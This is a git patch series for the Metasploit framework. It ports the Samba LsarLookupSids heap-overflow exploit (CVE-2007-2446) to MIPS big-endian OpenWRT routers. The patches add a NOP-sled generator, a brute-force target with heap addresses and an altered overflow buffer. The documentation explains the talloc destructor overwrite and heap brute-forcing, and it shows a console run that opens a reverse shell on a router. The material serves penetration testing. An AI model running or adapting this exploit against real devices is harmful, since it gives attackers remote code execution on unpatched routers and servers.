From 4d3611ceb9ec10656ee8821d536786b1dc51d3fe Mon Sep 17 00:00:00 2001 From: Jan Mitchell Date: Thu, 1 Sep 2016 09:55:08 +0100 Subject: [PATCH 1/5] Added MIPSBE support to Samba exploit. Added a MIPSBE nop generator --- modules/nops/mipsbe/better.rb | 108 ++++++++++++++++++++++++++++++++++ 1 file changed, 108 insertions(+) create mode 100644 modules/nops/mipsbe/better.rb diff --git a/modules/nops/mipsbe/better.rb b/modules/nops/mipsbe/better.rb new file mode 100644 index 0000000000..d68ef2ac6d --- /dev/null +++ b/modules/nops/mipsbe/better.rb @@ -0,0 +1,108 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + + +### +# +# MixedNop +# ---------- +# +# This class implements a mixed NOP generator for MIPS (big endian) +# +### +class MetasploitModule < Msf::Nop + + + def initialize + super( + 'Name' => 'Better', + 'Alias' => 'mipsbe_better', + 'Description' => 'Better NOP generator', + 'Author' => 'jm', + 'License' => MSF_LICENSE, + 'Arch' => ARCH_MIPSBE) + + register_advanced_options( + [ + OptBool.new('RandomNops', [ false, "Generate a random NOP sled", true ]) + ], self.class) + end + + def get_register() + return rand(27) + 1 + end + + def make_bne(reg) + op = 0x14000000 + + reg = get_register() + offset = rand(65536) + + op = op | ( reg << 21 ) | ( reg << 16 ) | offset + return op + end + + def make_or(reg) + op = 0x00000025 + + op = op | ( reg << 21 ) | ( reg << 11 ) + return op + end + + def make_sll(reg) + op = 0x00000000 + + op = op | ( reg << 16 ) | ( reg << 11 ) + return op + end + + def make_sra(reg) + op = 0x00000003 + + op = op | ( reg << 16 ) | ( reg << 11 ) + return op + end + + def make_srl(reg) + op = 0x00000002 + + op = op | ( reg << 16 ) | ( reg << 11 ) + return op + end + + def make_xori(reg) + op = 0x38000000 + + op = op | ( reg << 21 ) | ( reg << 16 ) + return op + end + + def make_ori(reg) + op = 0x34000000 + + op = op | ( reg << 21 ) | ( reg << 16 ) + return op + end + + def generate_sled(length, opts) + + badchars = opts['BadChars'] || '' + random = opts['Random'] || datastore['RandomNops'] + nop_fn = [ :make_bne, :make_or, :make_sll, :make_sra, :make_srl, :make_xori, :make_ori ] + sled = '' + + for i in 1..length/4 do + n = nop_fn.sample + sled << [send(n, get_register())].pack("N*") + end + + return sled + end + +end + From 411689aa444fb098b0047be08c40b27fcbc84ff7 Mon Sep 17 00:00:00 2001 From: Jan Mitchell Date: Thu, 1 Sep 2016 10:05:13 +0100 Subject: [PATCH 2/5] Adding changes to Samba exploit to target MIPSBE (this is for OpenWRT on a router --- .../exploits/linux/samba/lsa_transnames_heap.rb | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 5a9c5dfb6a..82a8c8b8fe 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -168,6 +168,20 @@ class MetasploitModule < Msf::Exploit::Remote } ], + ['Linux Heap Brute Force (OpenWRT MIPS)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_MIPSBE ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x55900000 }, + 'Stop' => { 'Ret' => 0x559c0000 }, + 'Step' => 60*1024, + } + } + ], + ['DEBUG', { 'Platform' => 'linux', @@ -267,7 +281,7 @@ class MetasploitModule < Msf::Exploit::Remote talloc_magic = "\x70\xec\x14\xe8" # second talloc_chunk header - buf << 'A' * 8 # next, prev + buf << NDR.long(0) + NDR.long(0) # next, prev buf << NDR.long(0) + NDR.long(0) # parent, child buf << NDR.long(0) # refs buf << [target_addrs['Ret']].pack('V') # destructor From c102384b7a789b165a8aa657c2af620dbdf6f823 Mon Sep 17 00:00:00 2001 From: Jan Mitchell Date: Fri, 16 Sep 2016 11:28:08 +0100 Subject: [PATCH 3/5] Remove spaces at EOL --- modules/nops/mipsbe/better.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/nops/mipsbe/better.rb b/modules/nops/mipsbe/better.rb index d68ef2ac6d..1b2ad61986 100644 --- a/modules/nops/mipsbe/better.rb +++ b/modules/nops/mipsbe/better.rb @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Nop ], self.class) end - def get_register() + def get_register() return rand(27) + 1 end @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Nop def make_or(reg) op = 0x00000025 - + op = op | ( reg << 21 ) | ( reg << 11 ) return op end From 97b7819a08a69c3f3e715cde39e6b7cdc8df48f5 Mon Sep 17 00:00:00 2001 From: Jan Mitchell Date: Mon, 31 Oct 2016 14:47:19 +0000 Subject: [PATCH 4/5] Adding documentation for lsatransnames_heap --- .../linux/samba/lsa_transnames_heap.md | 88 +++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 documentation/modules/exploit/linux/samba/lsa_transnames_heap.md diff --git a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md new file mode 100644 index 0000000000..489ee1d78e --- /dev/null +++ b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md @@ -0,0 +1,88 @@ +## Vulnerable Application + + Samba 3.0.0 through 3.0.25rc3 are vulnerable to mulitple heap overflows. This module targets a heap overflow in the LsarLookupSids RPC call (CVE-2007-2446), causing an overflow in the function lsa\_io\_trans_name(). + The exploit uses the heap overflow to overwrite a function pointer contained in the metadata of the TALLOC memory allocator, a technique which only works on Samba versions 3.0.21-3.0.24. + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use exploit/linux/samba/lsa_transnames_heap` + 3. Do: `show targets` to see the possible targets + 4. Do: `set target #` + 5. Do: `set rhost` + 6. Do: `exploit` + +## MIPS port + + This module was ported to exploit the MIPS architecture. After creating a suitable debugging environment using qemu to emulate Samba on a desktop PC the following steps were required: + +### MIPS nop generator + + The exploit uses a heap overflow to put a large nop sled in memory to decrease the accuracy needed in the initial redirection of code flow. A nop sled is a large section of contiguous instructions which do nothing. When code flow is redirected to a nop sled it will continue executing the effectless nops. At the end of the sled the true payload is added and execution will eventually hit this code. + A nop generator module was created for MIPS by creating a stream of random instructions which create no side-effects e.g. `sll $2, $2, 0` + +### Heap address bruteforce + + The exploit uses a brute force approach to minimise problems with unpredictability in heap layout. The exploit itself is run multiple times, each time targetting a different point in the heap with the change of execution flow. If all goes correctly then the nop sled will be hit and code execution will follow. If the nop sled is missed then the Samba process is likely to crash, which is generally not a problem as a new instance is forked for each incoming connection. In the event of a crash a new heap address is chosen and exploitation is attempted again. + When porting the exploit to a new system the approximate heap layout must be known in order to suitably attempt exploitation across all of the possible heap locations. As the MIPS port targetted a specific router the heap layout was determined by examining the ranges identified in _/proc//maps_ + +## Scenarios + + msf > use exploit/linux/samba/lsa\_transnames_heap + msf exploit(lsa\_transnames_heap) > set target 7 + target => 7 + msf exploit(lsa\_transnames_heap) > set rhost 192.168.1.1 + rhost => 192.168.1.1 + msf exploit(lsa\_transnames_heap) > show options + + Module options (exploit/linux/samba/lsa\_transnames_heap): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 192.168.1.1 yes The target address + RPORT 445 yes The SMB service port + SMBPIPE LSARPC yes The pipe name to use + + + Exploit target: + + Id Name + -- ---- + 7 Linux Heap Brute Force (OpenWRT MIPS) + + + msf exploit(lsa\_transnames_heap) > exploit + + [*] Started reverse TCP handler on 192.168.1.3:4444 + [*] 192.168.1.1:445 - Creating nop sled.... + [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55900000... + [*] 192.168.1.1:445 - Connecting to the SMB service... + [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Calling the vulnerable function... + [*] 192.168.1.1:445 - Server did not respond, this is expected + [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x5590f000... + [*] 192.168.1.1:445 - Connecting to the SMB service... + [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Calling the vulnerable function... + [*] 192.168.1.1:445 - Server did not respond, this is expected + + ...Some intermediate attempts ommitted... + + [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55996000... + [*] 192.168.1.1:445 - Connecting to the SMB service... + [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Calling the vulnerable function... + [*] 192.168.1.1:445 - Server did not respond, this is expected + [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x559a5000... + [*] 192.168.1.1:445 - Connecting to the SMB service... + [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Calling the vulnerable function... + [*] Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.1:4175) at 2016-10-31 14:00:33 +0000 + + uname -a + Linux WNR2200 2.6.15 #1 Mon Dec 23 15:58:24 CST 2013 mips unknown + From 312f33afa324e9ebe9ce9a20cdcacfffbc3ede39 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Nov 2016 07:36:54 -0600 Subject: [PATCH 5/5] minor formatting updates --- .../exploit/linux/samba/lsa_transnames_heap.md | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md index 489ee1d78e..09ba3d7f25 100644 --- a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md +++ b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md @@ -1,6 +1,7 @@ ## Vulnerable Application - Samba 3.0.0 through 3.0.25rc3 are vulnerable to mulitple heap overflows. This module targets a heap overflow in the LsarLookupSids RPC call (CVE-2007-2446), causing an overflow in the function lsa\_io\_trans_name(). + Samba 3.0.0 through 3.0.25rc3 are vulnerable to mulitple heap overflows. This module targets a heap overflow in the LsarLookupSids RPC call (CVE-2007-2446), causing an overflow in the function lsa\_io\_trans_name(). + The exploit uses the heap overflow to overwrite a function pointer contained in the metadata of the TALLOC memory allocator, a technique which only works on Samba versions 3.0.21-3.0.24. ## Verification Steps @@ -19,16 +20,18 @@ ### MIPS nop generator The exploit uses a heap overflow to put a large nop sled in memory to decrease the accuracy needed in the initial redirection of code flow. A nop sled is a large section of contiguous instructions which do nothing. When code flow is redirected to a nop sled it will continue executing the effectless nops. At the end of the sled the true payload is added and execution will eventually hit this code. + A nop generator module was created for MIPS by creating a stream of random instructions which create no side-effects e.g. `sll $2, $2, 0` - + ### Heap address bruteforce - The exploit uses a brute force approach to minimise problems with unpredictability in heap layout. The exploit itself is run multiple times, each time targetting a different point in the heap with the change of execution flow. If all goes correctly then the nop sled will be hit and code execution will follow. If the nop sled is missed then the Samba process is likely to crash, which is generally not a problem as a new instance is forked for each incoming connection. In the event of a crash a new heap address is chosen and exploitation is attempted again. - When porting the exploit to a new system the approximate heap layout must be known in order to suitably attempt exploitation across all of the possible heap locations. As the MIPS port targetted a specific router the heap layout was determined by examining the ranges identified in _/proc//maps_ + The exploit uses a brute force approach to minimise problems with unpredictability in heap layout. The exploit itself is run multiple times, each time targetting a different point in the heap with the change of execution flow. If all goes correctly, the nop sled will be hit and code execution will follow. If the nop sled is missed, the Samba process is likely to crash, which is generally not a problem as a new instance is forked for each incoming connection. In the event of a crash, a new heap address is chosen and exploitation is attempted again. + + When porting the exploit to a new system, the approximate heap layout must be known in order to suitably attempt exploitation across all of the possible heap locations. As the MIPS port targetted a specific router, the heap layout was determined by examining the ranges identified in _/proc//maps_ ## Scenarios - msf > use exploit/linux/samba/lsa\_transnames_heap + msf > use exploit/linux/samba/lsa\_transnames_heap msf exploit(lsa\_transnames_heap) > set target 7 target => 7 msf exploit(lsa\_transnames_heap) > set rhost 192.168.1.1 @@ -53,7 +56,7 @@ msf exploit(lsa\_transnames_heap) > exploit - [*] Started reverse TCP handler on 192.168.1.3:4444 + [*] Started reverse TCP handler on 192.168.1.3:4444 [*] 192.168.1.1:445 - Creating nop sled.... [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55900000... [*] 192.168.1.1:445 - Connecting to the SMB service...